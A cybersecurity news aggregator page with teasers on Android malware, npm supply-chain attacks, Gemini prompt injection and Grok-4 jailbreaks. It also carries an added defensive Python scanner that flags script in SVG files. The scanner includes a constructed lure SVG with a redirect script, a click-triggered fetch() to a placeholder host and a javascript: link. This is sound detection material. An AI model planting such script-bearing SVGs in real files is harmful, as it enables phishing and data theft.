Source: www.mcafee.com – Author: McAfee Labs. Authored by Dexter Shin. McAfee’s Mobile Research Team discovered a new and active Android malware campaign targeting Bengali-speaking users, mainly Bangladeshi people living abroad. The app poses as popular financial services like TapTap Send and AlimaPay. It is distributed through phishing sites and Facebook pages, and the app steals […] The entry "Fake Android Money Transfer App Targeting Bengali-Speaking Users" (Source: www.mcafee.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.darkreading.com – Author: Alexander Culafi. (The feed captured an access-blocked page instead of the article text.) The entry "Web-Inject Campaign Debuts Fresh Interlock RAT Variant" (Source: www.darkreading.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.darkreading.com – Author: Kristina Beek. (The feed captured an access-blocked page instead of the article text.) The entry "Military Veterans May Be What Cybersecurity Is Looking For" (Source: www.darkreading.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.darkreading.com – Author: Elizabeth Montalbano, Contributing Writer. (The feed captured an access-blocked page instead of the article text.) The entry "Google Gemini AI Bug Allows Invisible, Malicious Prompts" (Source: www.darkreading.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.darkreading.com – Author: Ty Greenhalgh. (The feed captured an access-blocked page instead of the article text.) The entry "The Dark Side of Global Power Shifts & Demographic Decline" (Source: www.darkreading.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Artificial Intelligence

Source: www.csoonline.com – Author: The CISO’s role has always been to protect the organization from threats it does not yet understand. AI poisoning requires CISOs to rethink risk, architecture, relationships, and shared responsibility. In May 2025, the NSA, CISA, and FBI issued a joint bulletin authored with the cooperation of the governments of Australia, New […] The entry "AI poisoning and the CISO’s crisis of trust" (Source: www.csoonline.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 CSOonline

Source: www.csoonline.com – Author: Gathering threat intelligence, finding the perpetrators of cyber attacks and bringing down whole ransomware gangs are some of the ways defenders use the dark web. The term “dark web” may paint a picture in our head of threat actors lurking underground, on the shrouded parts of the internet […] The entry "How defenders use the dark web" (Source: www.csoonline.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 CSOonline

Source: www.csoonline.com – Author: A bug in Google Gemini allows attackers to hijack email summaries and launch phishing attacks. Hackers can use Google Gemini to carry out hidden phishing attacks. Google Gemini for Workspace can be abused to generate email summaries that look legitimate but contain malicious instructions or warnings. The problem: attackers can […] The entry "Google Gemini-Lücke ermöglicht versteckte Phishing-Angriffe" (Google Gemini flaw enables hidden phishing attacks; Source: www.csoonline.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 CSOonline

Source: www.csoonline.com – Author: In practice, incident response teams repeatedly encounter the same weaknesses. What are they and how can they be resolved? Encrypted files and a text file containing a ransom note clearly indicate that a company has fallen victim to a cyberattack. But this is only the end of a long chain of […] The entry "The 10 most common IT security mistakes" (Source: www.csoonline.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Artificial Intelligence

Source: www.csoonline.com – Author: Just days after launch, Elon Musk’s Grok-4 is compromised by researchers using a stealthy blend of Echo Chamber and Crescendo techniques, exposing deep flaws in AI safety systems. xAI’s newly launched Grok-4 is already showing cracks in its defenses, falling to recently revealed multi-conversational, suggestive jailbreak techniques. Two days after Elon […] The entry "New Grok-4 AI breached within 48 hours using ‘whispered’ jailbreaks" (Source: www.csoonline.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: thehackernews.com – Author: . The North Korean threat actors linked to the Contagious Interview campaign have been observed publishing another set of 67 malicious packages to the npm registry, underscoring ongoing attempts to poison the open-source ecosystem via software supply chain attacks. The packages, per Socket, have attracted more than 17,000 downloads, and incorporate […] The entry "North Korean Hackers Flood npm Registry with XORIndex Malware in Ongoing Attack Campaign" (Source: thehackernews.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Abacus

Source: www.infosecurity-magazine.com – Author: The Western world’s highest-grossing dark web marketplace went offline earlier this month in a likely exit scam, according to industry experts. Blockchain intelligence firm TRM Labs said that users of Abacus Market began reporting withdrawal issues in late June. This is a common precursor to an exit scam, which takes place […] The entry "Abacus Market Shutters After Exit Scam, Say Experts" (Source: www.infosecurity-magazine.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.infosecurity-magazine.com – Author: The UK’s National Cyber Security Centre (NCSC) has launched a new initiative designed to enhance its understanding of vulnerability research and improve the sharing of best practices among the external cybersecurity community. Announced yesterday, the Vulnerability Research Institute (VRI) will help the NCSC to better understand: vulnerabilities present in specific products […] The entry "NCSC Launches Vulnerability Research Institute to Boost UK Resilience" (Source: www.infosecurity-magazine.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 'Cyber

Source: levelblue.com – Author: hello@alienvault.com. Let’s face it: cybersecurity is no longer a game of building taller walls or thicker locks. The old rules, the ones based on the idea that threats come only from outside, just don’t hold up anymore. In today’s digital world, where employees connect from anywhere, apps live in the cloud, and […] The entry "Why Zero Trust Is Essential for Effective Cybersecurity" (Source: levelblue.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 1 - Cyber Security News Post

Source: hackread.com – Author: Deeba Ahmed. A new form of cyberattack is on the rise, with hackers now using seemingly harmless Scalable Vector Graphics (SVG) image files to sneak malicious code past traditional defences, reveals the latest research from the Ontinue Advanced Threat Operations team. This technique, dubbed “SVG Smuggling” by researchers, weaponises these typically […] The entry "Attackers Hide JavaScript in SVG Images to Lure Users to Malicious Sites" (Source: hackread.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
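SVG is XML, so the script an attacker smuggles in it has to sit somewhere a parser can see: a script element, an on* event-handler attribute, a javascript: or data: URL, or HTML embedded via foreignObject. As an added example (not code from the article or from Ontinue), the following Python walks an SVG's element tree and reports each such construct, which is the check a mail gateway or upload handler would run before serving a file as image/svg+xml. The lure and benign SVGs are constructed for this example, and example.invalid is a placeholder hostname.

```python
import re
import xml.etree.ElementTree as ET
from typing import List

# URL schemes that run code or smuggle content instead of pointing at a resource.
ACTIVE_URL = re.compile(r"^\s*(javascript|data|vbscript)\s*:", re.IGNORECASE)
# Elements that execute script or embed foreign (HTML) content on their own.
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}
# Attributes that can carry a URL (xlink:href normalises to plain 'href' below).
URL_ATTRIBUTES = {"href", "src", "data"}


def local_name(qualified: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on tag and attribute names."""
    return qualified.rsplit("}", 1)[-1]


def find_active_content(svg: bytes) -> List[str]:
    """Return one finding per script-bearing construct found in the SVG document."""
    # The stdlib parser does not fetch external entities, but for untrusted input in
    # production use defusedxml, which also rejects entity-expansion bombs.
    root = ET.fromstring(svg)
    findings = []
    for el in root.iter():
        name = local_name(el.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append(f"<{name}> element")
        for attr, value in el.attrib.items():
            a = local_name(attr)
            if a.lower().startswith("on"):                      # onload, onclick, onmouseover, ...
                findings.append(f"event handler {a} on <{name}>")
            elif a in URL_ATTRIBUTES and ACTIVE_URL.match(value):
                scheme = value.split(":", 1)[0].strip().lower()
                findings.append(f"{a} with {scheme}: URL on <{name}>")
    return findings


# Constructed sample: a lure that redirects on open, exfiltrates on click and
# carries a javascript: link, drawn as an innocent-looking grey box.
LURE_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="64" height="64">
  <script><![CDATA[ window.location = "https://example.invalid/lure"; ]]></script>
  <rect width="64" height="64" fill="#eee" onclick="fetch('https://example.invalid/c')"/>
  <a xlink:href="javascript:void(0)"><text x="8" y="32">Open document</text></a>
</svg>"""

# Constructed sample: a plain icon with nothing active in it.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16">
  <circle cx="8" cy="8" r="6" fill="#0a0"/>
</svg>"""

if __name__ == "__main__":
    for label, doc in (("lure.svg", LURE_SVG), ("icon.svg", BENIGN_SVG)):
        hits = find_active_content(doc)
        print(f"{label}: {'REJECT' if hits else 'ok'}")
        for h in hits:
            print(f"  - {h}")
```

Any finding is grounds to reject the file or rasterise it to PNG rather than serve it inline; a scanner that only looks for the literal string `<script` misses the event-handler and javascript: URL cases that the tree walk catches here.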

 1 - Cyber Security News Post

Source: hackread.com – Author: Waqas. UK pet owners are being hit with convincing scam emails demanding microchip registration renewals, and the source of the problem appears to lie deeper than just spam. A recent investigation by Pen Test Partners has revealed serious security issues in how microchip data is stored and accessed, giving scammers the […] The entry "UK Pet Owners Targeted by Fake Microchip Renewal Scams" (Source: hackread.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 1 - Cyber Security News Post

Source: hackread.com – Author: CyberNewswire. Paris, France, July 15th, 2025, CyberNewsWire. GitGuardian, the leader in automated secrets detection and remediation, today announced the launch of its Model Context Protocol (MCP) Server, a powerful new infrastructure designed to bring AI-assisted secrets security directly into developer environments. As intelligent agents begin to reshape the software development landscape, […] The entry "GitGuardian Launches MCP Server to Bring Secrets Security into Developer Workflows" (Source: hackread.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 1 - Cyber Security News Post

Source: hackread.com – Author: Owais Sultan. Meme coins started as internet jokes, but by 2025, they’ve become one of the most volatile and talked-about parts of the crypto world. Once dismissed as unserious, these tokens now account for a major part of trading activity. According to analytics from CoinGecko and LunarCrush, meme coins made up […] The entry "Meme Coins in 2025: High Risk, High Reward, and Rising Security Threats" (Source: hackread.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
